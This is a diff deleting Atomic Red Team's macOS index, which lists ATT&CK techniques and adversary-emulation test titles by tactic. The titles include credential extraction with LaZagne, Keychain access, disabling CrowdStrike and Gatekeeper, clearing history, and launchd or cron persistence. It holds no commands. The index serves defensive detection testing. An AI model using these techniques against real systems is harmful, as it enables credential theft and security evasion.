- T1189 Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1190 Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1133 External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1200 Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1078.003 Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1566 Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1566.001 Spearphishing Attachment [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1566.002 Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1566.003 Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1195 Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1199 Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
atomics/Indexes/Indexes-Markdown/macos-index.md
-536
View File
@@ -1,536 +0,0 @@
# macOS Atomic Tests by ATT&CK Tactic & Technique
# credential-access
- T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1552.003 Bash History](../../T1552.003/T1552.003.md)
- Atomic Test #1: Search Through Bash History [linux, macos]
- T1110 Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1110.004 Credential Stuffing](../../T1110.004/T1110.004.md)
- Atomic Test #2: SSH Credential Stuffing From MacOS [macos]
- [T1552.001 Credentials In Files](../../T1552.001/T1552.001.md)
- Atomic Test #1: Extract Browser and System credentials with LaZagne [macos]
- Atomic Test #2: Extract passwords with grep [macos, linux]
- Atomic Test #5: Find and Access Github Credentials [macos, linux]
- T1555 Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1555.003 Credentials from Web Browsers](../../T1555.003/T1555.003.md)
- Atomic Test #2: Search macOS Safari Cookies [macos]
- T1212 Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1606 Forge Web Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1056.002 GUI Input Capture](../../T1056.002/T1056.002.md)
- Atomic Test #1: AppleScript - Prompt User for Password [macos]
- T1056 Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1555.001 Keychain](../../T1555.001/T1555.001.md)
- Atomic Test #1: Keychain [macos]
- T1056.001 Keylogging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1040 Network Sniffing](../../T1040/T1040.md)
- Atomic Test #2: Packet Capture macOS [macos]
- T1003 OS Credential Dumping [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1110.002 Password Cracking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1110.001 Password Guessing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1555.005 Password Managers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1110.003 Password Spraying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1556.003 Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1552.004 Private Keys](../../T1552.004/T1552.004.md)
- Atomic Test #2: Discover Private SSH Keys [macos, linux]
- Atomic Test #4: Copy Private SSH Keys with rsync [macos, linux]
- T1555.002 Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1539 Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1111 Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1552 Unsecured Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1606.001 Web Cookies [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
# collection
- T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1560 Archive Collected Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1560.003 Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1560.002 Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1560.001 Archive via Utility](../../T1560.001/T1560.001.md)
- Atomic Test #5: Data Compressed - nix - zip [linux, macos]
- Atomic Test #6: Data Compressed - nix - gzip Single File [linux, macos]
- Atomic Test #7: Data Compressed - nix - tar Folder or File [linux, macos]
- Atomic Test #8: Data Encrypted with zip and gpg symmetric [macos, linux]
- T1123 Audio Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1119 Automated Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1115 Clipboard Data](../../T1115/T1115.md)
- Atomic Test #3: Execute commands from clipboard [macos]
- T1074 Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1213 Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1005 Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1039 Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1025 Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1056.002 GUI Input Capture](../../T1056.002/T1056.002.md)
- Atomic Test #1: AppleScript - Prompt User for Password [macos]
- T1056 Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1056.001 Keylogging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1074.001 Local Data Staging](../../T1074.001/T1074.001.md)
- Atomic Test #2: Stage data from Discovery.sh [linux, macos]
- T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1074.002 Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1113 Screen Capture](../../T1113/T1113.md)
- Atomic Test #1: Screencapture [macos]
- Atomic Test #2: Screencapture (silent) [macos]
- T1125 Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
# privilege-escalation
- T1548 Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1053.003 Cron](../../T1053.003/T1053.003.md)
- Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux]
- Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux]
- T1078.001 Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574.006 Dynamic Linker Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1548.004 Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1546.014 Emond](../../T1546.014/T1546.014.md)
- Atomic Test #1: Persistance with Event Monitor - emond [macos]
- T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1068 Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1547.006 Kernel Modules and Extensions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1546.006 LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1543.001 Launch Agent](../../T1543.001/T1543.001.md)
- Atomic Test #1: Launch Agent [macos]
- [T1543.004 Launch Daemon](../../T1543.004/T1543.004.md)
- Atomic Test #1: Launch Daemon [macos]
- [T1053.004 Launchd](../../T1053.004/T1053.004.md)
- Atomic Test #1: Event Monitor Daemon Persistence [macos]
- T1078.003 Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1037.002 Logon Script (Mac)](../../T1037.002/T1037.002.md)
- Atomic Test #1: Logon Scripts - Mac [macos]
- [T1547.011 Plist Modification](../../T1547.011/T1547.011.md)
- Atomic Test #1: Plist Modification [macos]
- T1055 Process Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1037.004 RC Scripts](../../T1037.004/T1037.004.md)
- Atomic Test #1: rc.common [macos]
- [T1547.007 Re-opened Applications](../../T1547.007/T1547.007.md)
- Atomic Test #1: Re-Opened Applications [macos]
- Atomic Test #2: Re-Opened Applications [macos]
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1548.001 Setuid and Setgid](../../T1548.001/T1548.001.md)
- Atomic Test #1: Make and modify binary from C source [macos, linux]
- Atomic Test #2: Set a SetUID flag on file [macos, linux]
- Atomic Test #3: Set a SetGID flag on file [macos, linux]
- [T1037.005 Startup Items](../../T1037.005/T1037.005.md)
- Atomic Test #1: Add file to Local Library StartupItems [macos]
- [T1548.003 Sudo and Sudo Caching](../../T1548.003/T1548.003.md)
- Atomic Test #1: Sudo usage [macos, linux]
- Atomic Test #2: Unlimited sudo cache timeout [macos, linux]
- Atomic Test #3: Disable tty_tickets for sudo caching [macos, linux]
- [T1546.005 Trap](../../T1546.005/T1546.005.md)
- Atomic Test #1: Trap [macos, linux]
- [T1546.004 Unix Shell Configuration Modification](../../T1546.004/T1546.004.md)
- Atomic Test #1: Add command to .bash_profile [macos, linux]
- Atomic Test #2: Add command to .bashrc [macos, linux]
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
# defense-evasion
- T1548 Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1027.001 Binary Padding](../../T1027.001/T1027.001.md)
- Atomic Test #1: Pad Binary to Change Hash - Linux/macOS dd [macos, linux]
- [T1070.003 Clear Command History](../../T1070.003/T1070.003.md)
- Atomic Test #1: Clear Bash history (rm) [linux, macos]
- Atomic Test #3: Clear Bash history (cat dev/null) [linux, macos]
- Atomic Test #4: Clear Bash history (ln dev/null) [linux, macos]
- Atomic Test #6: Clear history of a bunch of shells [linux, macos]
- Atomic Test #7: Clear and Disable Bash History Logging [linux, macos]
- Atomic Test #8: Use Space Before Command to Avoid Logging to History [linux, macos]
- [T1070.002 Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md)
- Atomic Test #1: rm -rf [macos, linux]
- T1553.002 Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1553.006 Code Signing Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1027.004 Compile After Delivery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1078.001 Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1140 Deobfuscate/Decode Files or Information [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1562.004 Disable or Modify System Firewall [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1562.001 Disable or Modify Tools](../../T1562.001/T1562.001.md)
- Atomic Test #5: Disable Carbon Black Response [macos]
- Atomic Test #6: Disable LittleSnitch [macos]
- Atomic Test #7: Disable OpenDNS Umbrella [macos]
- Atomic Test #8: Disable macOS Gatekeeper [macos]
- Atomic Test #9: Stop and unload Crowdstrike Falcon on macOS [macos]
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574.006 Dynamic Linker Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1548.004 Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1480.001 Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1480 Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1070.004 File Deletion](../../T1070.004/T1070.004.md)
- Atomic Test #1: Delete a single file - Linux/macOS [linux, macos]
- Atomic Test #2: Delete an entire folder - Linux/macOS [linux, macos]
- T1222 File and Directory Permissions Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1553.001 Gatekeeper Bypass](../../T1553.001/T1553.001.md)
- Atomic Test #1: Gatekeeper Bypass [macos]
- T1564.005 Hidden File System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1564.001 Hidden Files and Directories](../../T1564.001/T1564.001.md)
- Atomic Test #1: Create a hidden file in a hidden directory [linux, macos]
- Atomic Test #2: Mac Hidden file [macos]
- Atomic Test #5: Hidden files [macos]
- Atomic Test #6: Hide a Directory [macos]
- Atomic Test #7: Show all hidden files [macos]
- [T1564.002 Hidden Users](../../T1564.002/T1564.002.md)
- Atomic Test #1: Create Hidden User using UniqueID < 500 [macos]
- Atomic Test #2: Create Hidden User using IsHidden option [macos]
- T1564.003 Hidden Window [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1564 Hide Artifacts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1562.003 Impair Command History Logging](../../T1562.003/T1562.003.md)
- Atomic Test #1: Disable history collection [linux, macos]
- Atomic Test #2: Mac HISTCONTROL [macos, linux]
- T1562 Impair Defenses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1562.006 Indicator Blocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1027.005 Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1070 Indicator Removal on Host [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1553.004 Install Root Certificate](../../T1553.004/T1553.004.md)
- Atomic Test #3: Install root CA on macOS [macos]
- T1036.001 Invalid Code Signature [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1149 LC_MAIN Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1222.002 Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md)
- Atomic Test #1: chmod - Change file or folder mode (numeric mode) [macos, linux]
- Atomic Test #2: chmod - Change file or folder mode (symbolic mode) [macos, linux]
- Atomic Test #3: chmod - Change file or folder mode (numeric mode) recursively [macos, linux]
- Atomic Test #4: chmod - Change file or folder mode (symbolic mode) recursively [macos, linux]
- Atomic Test #5: chown - Change file or folder ownership and group [macos, linux]
- Atomic Test #6: chown - Change file or folder ownership and group recursively [macos, linux]
- Atomic Test #7: chown - Change file or folder mode ownership only [macos, linux]
- Atomic Test #8: chown - Change file or folder ownership recursively [macos, linux]
- Atomic Test #9: chattr - Remove immutable file attribute [macos, linux]
- T1078.003 Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1036 Masquerading [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1036.005 Match Legitimate Name or Location](../../T1036.005/T1036.005.md)
- Atomic Test #1: Execute a process from a directory masquerading as the current parent directory. [macos, linux]
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1027 Obfuscated Files or Information](../../T1027/T1027.md)
- Atomic Test #1: Decode base64 Data into Script [macos, linux]
- T1556.003 Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055 Process Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1108 Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1036.003 Rename System Utilities [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1036.002 Right-to-Left Override [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1014 Rootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1564.006 Run Virtual Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1064 Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1548.001 Setuid and Setgid](../../T1548.001/T1548.001.md)
- Atomic Test #1: Make and modify binary from C source [macos, linux]
- Atomic Test #2: Set a SetUID flag on file [macos, linux]
- Atomic Test #3: Set a SetGID flag on file [macos, linux]
- [T1027.002 Software Packing](../../T1027.002/T1027.002.md)
- Atomic Test #3: Binary simply packed by UPX [macos]
- Atomic Test #4: Binary packed by UPX, with modified headers [macos]
- [T1036.006 Space after Filename](../../T1036.006/T1036.006.md)
- Atomic Test #1: Space After Filename [macos]
- T1027.003 Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1553 Subvert Trust Controls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1548.003 Sudo and Sudo Caching](../../T1548.003/T1548.003.md)
- Atomic Test #1: Sudo usage [macos, linux]
- Atomic Test #2: Unlimited sudo cache timeout [macos, linux]
- Atomic Test #3: Disable tty_tickets for sudo caching [macos, linux]
- [T1497.001 System Checks](../../T1497.001/T1497.001.md)
- Atomic Test #3: Detect Virtualization Environment (MacOS) [macos]
- T1497.003 Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1070.006 Timestomp](../../T1070.006/T1070.006.md)
- Atomic Test #1: Set a file's access timestamp [linux, macos]
- Atomic Test #2: Set a file's modification timestamp [linux, macos]
- Atomic Test #3: Set a file's creation timestamp [linux, macos]
- Atomic Test #4: Modify file timestamps using reference file [linux, macos]
- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1564.007 VBA Stomping [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
# impact
- T1531 Account Access Removal [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1499.003 Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1499.004 Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1485 Data Destruction](../../T1485/T1485.md)
- Atomic Test #2: macOS/Linux - Overwrite file with DD [linux, macos]
- T1486 Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1565 Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1491 Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1498.001 Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1561.001 Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1561.002 Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1561 Disk Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1499 Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1491.002 External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1495 Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1490 Inhibit System Recovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1491.001 Internal Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1498 Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1499.001 OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1498.002 Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1496 Resource Hijacking](../../T1496/T1496.md)
- Atomic Test #1: macOS/Linux - Simulate CPU Load with Yes [macos, linux]
- T1565.003 Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1499.002 Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1489 Service Stop [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1565.001 Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1529 System Shutdown/Reboot](../../T1529/T1529.md)
- Atomic Test #3: Restart System via `shutdown` - macOS/Linux [macos, linux]
- Atomic Test #4: Shutdown System via `shutdown` - macOS/Linux [macos, linux]
- Atomic Test #5: Restart System via `reboot` - macOS/Linux [macos, linux]
- T1565.002 Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
# discovery
- T1087 Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1010 Application Window Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1217 Browser Bookmark Discovery](../../T1217/T1217.md)
- Atomic Test #2: List Mozilla Firefox Bookmark Database Files on macOS [macos]
- Atomic Test #3: List Google Chrome Bookmark JSON Files on macOS [macos]
- T1087.002 Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1069.002 Domain Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1083 File and Directory Discovery](../../T1083/T1083.md)
- Atomic Test #3: Nix File and Diectory Discovery [macos, linux]
- Atomic Test #4: Nix File and Directory Discovery 2 [macos, linux]
- T1016.001 Internet Connection Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1087.001 Local Account](../../T1087.001/T1087.001.md)
- Atomic Test #2: View sudoers access [linux, macos]
- Atomic Test #3: View accounts with UID 0 [linux, macos]
- Atomic Test #4: List opened files by user [linux, macos]
- Atomic Test #6: Enumerate users and groups [linux, macos]
- Atomic Test #7: Enumerate users and groups [macos]
- [T1069.001 Local Groups](../../T1069.001/T1069.001.md)
- Atomic Test #1: Permission Groups Discovery (Local) [macos, linux]
- [T1046 Network Service Scanning](../../T1046/T1046.md)
- Atomic Test #1: Port Scan [linux, macos]
- Atomic Test #2: Port Scan Nmap [linux, macos]
- [T1135 Network Share Discovery](../../T1135/T1135.md)
- Atomic Test #1: Network Share Discovery [macos]
- [T1040 Network Sniffing](../../T1040/T1040.md)
- Atomic Test #2: Packet Capture macOS [macos]
- [T1201 Password Policy Discovery](../../T1201/T1201.md)
- Atomic Test #7: Examine password policy - macOS [macos]
- T1120 Peripheral Device Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1069 Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1057 Process Discovery](../../T1057/T1057.md)
- Atomic Test #1: Process Discovery - ps [macos, linux]
- [T1018 Remote System Discovery](../../T1018/T1018.md)
- Atomic Test #6: Remote System Discovery - arp nix [linux, macos]
- Atomic Test #7: Remote System Discovery - sweep [linux, macos]
- [T1518.001 Security Software Discovery](../../T1518.001/T1518.001.md)
- Atomic Test #3: Security Software Discovery - ps (macOS) [macos]
- [T1518 Software Discovery](../../T1518/T1518.md)
- Atomic Test #3: Find and Display Safari Browser Version [macos]
- [T1497.001 System Checks](../../T1497.001/T1497.001.md)
- Atomic Test #3: Detect Virtualization Environment (MacOS) [macos]
- [T1082 System Information Discovery](../../T1082/T1082.md)
- Atomic Test #2: System Information Discovery [macos]
- Atomic Test #3: List OS Information [linux, macos]
- Atomic Test #7: Hostname Discovery [linux, macos]
- Atomic Test #11: Environment variables discovery on macos and linux [macos, linux]
- T1614 System Location Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1016 System Network Configuration Discovery](../../T1016/T1016.md)
- Atomic Test #3: System Network Configuration Discovery [macos, linux]
- Atomic Test #8: List macOS Firewall Rules [macos]
- [T1049 System Network Connections Discovery](../../T1049/T1049.md)
- Atomic Test #3: System Network Connections Discovery Linux & MacOS [linux, macos]
- [T1033 System Owner/User Discovery](../../T1033/T1033.md)
- Atomic Test #2: System Owner/User Discovery [linux, macos]
- T1497.003 Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
# persistence
- T1098 Account Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1176 Browser Extensions](../../T1176/T1176.md)
- Atomic Test #1: Chrome (Developer Mode) [linux, windows, macos]
- Atomic Test #2: Chrome (Chrome Web Store) [linux, windows, macos]
- Atomic Test #3: Firefox [linux, windows, macos]
- Atomic Test #4: Edge Chromium Addon - VPN [windows, macos]
- T1554 Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1136 Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1053.003 Cron](../../T1053.003/T1053.003.md)
- Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux]
- Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux]
- T1078.001 Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1136.002 Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574.006 Dynamic Linker Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1546.014 Emond](../../T1546.014/T1546.014.md)
- Atomic Test #1: Persistance with Event Monitor - emond [macos]
- T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1547.006 Kernel Modules and Extensions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1546.006 LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1543.001 Launch Agent](../../T1543.001/T1543.001.md)
- Atomic Test #1: Launch Agent [macos]
- [T1543.004 Launch Daemon](../../T1543.004/T1543.004.md)
- Atomic Test #1: Launch Daemon [macos]
- [T1053.004 Launchd](../../T1053.004/T1053.004.md)
- Atomic Test #1: Event Monitor Daemon Persistence [macos]
- [T1136.001 Local Account](../../T1136.001/T1136.001.md)
- Atomic Test #2: Create a user account on a MacOS system [macos]
- T1078.003 Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1037.002 Logon Script (Mac)](../../T1037.002/T1037.002.md)
- Atomic Test #1: Logon Scripts - Mac [macos]
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1547.011 Plist Modification](../../T1547.011/T1547.011.md)
- Atomic Test #1: Plist Modification [macos]
- T1556.003 Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1037.004 RC Scripts](../../T1037.004/T1037.004.md)
- Atomic Test #1: rc.common [macos]
- [T1547.007 Re-opened Applications](../../T1547.007/T1547.007.md)
- Atomic Test #1: Re-Opened Applications [macos]
- Atomic Test #2: Re-Opened Applications [macos]
- T1108 Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1098.004 SSH Authorized Keys](../../T1098.004/T1098.004.md)
- Atomic Test #1: Modify SSH Authorized Keys [macos, linux]
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1505 Server Software Component [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1037.005 Startup Items](../../T1037.005/T1037.005.md)
- Atomic Test #1: Add file to Local Library StartupItems [macos]
- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1546.005 Trap](../../T1546.005/T1546.005.md)
- Atomic Test #1: Trap [macos, linux]
- [T1546.004 Unix Shell Configuration Modification](../../T1546.004/T1546.004.md)
- Atomic Test #1: Add command to .bash_profile [macos, linux]
- Atomic Test #2: Add command to .bashrc [macos, linux]
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1505.003 Web Shell [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
# execution
- [T1059.002 AppleScript](../../T1059.002/T1059.002.md)
- Atomic Test #1: AppleScript [macos]
- T1059 Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1053.003 Cron](../../T1053.003/T1053.003.md)
- Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux]
- Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux]
